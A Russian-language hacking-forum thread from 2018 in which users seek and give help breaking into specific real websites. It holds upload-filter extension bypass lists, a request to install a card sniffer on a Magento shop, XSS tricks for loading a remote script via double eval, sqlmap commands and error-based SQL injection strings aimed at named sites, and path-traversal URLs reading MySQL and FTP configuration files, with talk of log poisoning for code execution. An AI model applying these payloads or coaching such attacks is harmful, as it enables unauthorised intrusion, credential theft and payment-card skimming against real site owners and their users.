0.72611600+15169956671.php.jpg
А в итоге картинка на странице выводется так
Code:
000/013/927/000013927615.jpg
Вопрос как все генерируется куда копать?
Octavian said:
↑ (https://antichat.live/posts/4177762/)
Сама страница получяет такои ответ от сервера
Code:
0.72611600+15169956671.php.jpg
А в итоге картинка на странице выводется так
Code:
000/013/927/000013927615.jpg
Вопрос как все генерируется куда копать?
Пробуйте подменить заголовок application-jpg
Мне помогла статья
https://habrahabr.ru/post/148999/
Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги:
Code:
2015-11-19T15:19:41.000000Z
345d3c642a73d0f3d463fb1aba2b3e74
2015-11-19T14:39:32.670226Z
launcher
dir
auth
dir
CoolHucker
30.01.2018, 03:53
Парни подскажите что можно сделать??!
http://school2.perm.ru/administrator и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно.
P.S. Есть мысли ???может кто поможет в этом направлении?
CoolHucker said:
↑ (https://antichat.live/posts/4178981/)
Парни подскажите что можно сделать??!
http://school2.perm.ru/administrator
и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно.
P.S. Есть мысли ???может кто поможет в этом направлении?
Там нет ни LFI, ни RFI. Я объясню почему так.
В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же.
Данное можно трактовать как обычное раскрытие полного пути.
Muracha said:
↑ (https://antichat.live/posts/4178504/)
Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги:
Code:
2015-11-19T15:19:41.000000Z
345d3c642a73d0f3d463fb1aba2b3e74
2015-11-19T14:39:32.670226Z
launcher
dir
auth
dir
Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую этот (https://github.com/anantshri/svn-extractor) скрипт.
CoolHucker
30.01.2018, 21:39
xaphan said:
↑ (https://antichat.live/posts/4179157/)
Там нет ни LFI, ни RFI. Я объясню почему так.
В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же.
Данное можно трактовать как обычное раскрытие полного пути.
Спасибо за толкование.только неужели нельзя добраться до этого сайта никак?)
panic.ker
31.01.2018, 00:04
Можно. Только за тебя это делать никто не будет. Это ветка вопросов по уязвимостям, а не по просьбам о взломе. Найди уязвимость, а растолковать и прояснить моменты-мы всегда за.
Octavian
03.02.2018, 02:55
Посоветуите нормальныи большои список bypass extension для картинок
Code:
image.php.jpg
image.jpg.php
image.php;.jpg
image.php%00.jpg
image.php\0.jpg
xaphan said:
↑ (https://antichat.live/posts/4179163/)
Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую
этот (https://github.com/anantshri/svn-extractor)
скрипт.
спасибо! помогло!
А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд
dirb использую, dirbuster тоже но интересует более узкоспециализированное
DezMond™
04.02.2018, 17:48
Magento Version 1.8.1.0
Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?
Octavian
05.02.2018, 20:26
Есть такои XSS вектор
Code:
Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
Code:
ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
Octavian said:
↑ (https://antichat.live/posts/4181023/)
Есть такои XSS вектор
Code:
Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
Code:
ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
HTML:
нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада
содержимое самого php:
PHP:
Octavian
06.02.2018, 14:19
dmax0fw said:
↑ (https://antichat.live/posts/4181251/)
HTML:
нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада
содержимое самого php:
PHP:
Не хочет
Code:
s.php
Code:
http://host/images/s/s.php
Code:
alert("1");
Octavian said:
↑ (https://antichat.live/posts/4181299/)
Не хочет
HTML:
нужно дважды евалить
HTML:
первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload
Вопрос по SQL injection
Code:
GET /getaddr.cgi?heataccount=%5c
.SpoilerTarget" type="button">Spoiler: скриншот
https://s8.hostingkartinok.com/uploads/images/2018/02/9401410a00973654ad651fc8b40b7582.png
Code:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
Code:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
Не катит он тупа не видит
Как раскрутить кто знает ?
erwerr2321
09.02.2018, 10:48
Sensoft said:
↑ (https://antichat.live/posts/4182176/)
Как раскрутить кто знает ?
Руками может?
karkajoi
09.02.2018, 15:00
Sensoft said:
↑ (https://antichat.live/posts/4182176/)
Вопрос по SQL injection
Code:
GET /getaddr.cgi?heataccount=%5c
Spoiler: скриншот
https://s8.hostingkartinok.com/uploads/images/2018/02/9401410a00973654ad651fc8b40b7582.png
Code:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
Code:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
Не катит он тупа не видит
Как раскрутить кто знает ?
level=5 попробуй в мапе, ну и руками error based вектор пробуй.
Code:
/getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
/getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
BabaDook
12.02.2018, 14:21
100500 waf
erwerr2321
12.02.2018, 14:54
man474019 said:
↑ (https://antichat.live/posts/4183304/)
and, what can do in this situation ?
Try boolean-based via more than 1 row )
http://texnousta.com/index.php?rout...Value(1,concat(0x3a,(select(versi on())))))='1 (http://texnousta.com/index.php?route=product/category&path=25_32%27or(ExtractValue(1,concat(0x3a,(select (version())))))=%271)
MotherHacker
12.02.2018, 15:27
man474019 said:
↑ (https://antichat.live/posts/4183307/)
sorry, but there waf blocks _ symbol, don't know how to bypass
++
default opencart tables have _ symbol (
look here
https://rdot.org/forum/showthread.php?t=2869
https://rdot.org/forum/showpost.php?p=18012&postcount=10
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.
Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
Code:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
Что нашел:
- конфиг мускула
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
- конфиг фтп
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
- логи фтп (не нашел подключения)
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
Что не могу найти:
- логи апача
- способ залиться
z3u5 said:
↑ (https://antichat.live/posts/4184197/)
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.
Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
Code:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
Что нашел:
- конфиг мускула
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
- конфиг фтп
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
- логи фтп (не нашел подключения)
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
Что не могу найти:
- логи апача
- способ залиться
чёт не фурычит сайт )
Sensoft said:
↑ (https://antichat.live/posts/4184200/)
чёт не фурычит сайт )
С СНГ IP может не пускать.
Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)
z3u5 said:
↑ (https://antichat.live/posts/4184197/)
Нашел LFI через сканер (netsparker)
Ниразу не LFI, это читалка. На чтение логов нет прав.
crlf said:
↑ (https://antichat.live/posts/4184218/)
Ниразу не LFI, это читалка. На чтение логов нет прав.
Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера.
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
erwerr2321
14.02.2018, 15:33
z3u5 said:
↑ (https://antichat.live/posts/4184221/)
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
код должен выполняться?
ms13 said:
↑ (https://antichat.live/posts/4184223/)
код должен выполняться?
Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты?
Я не в теме, пишу без наездов, вам все кажется.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot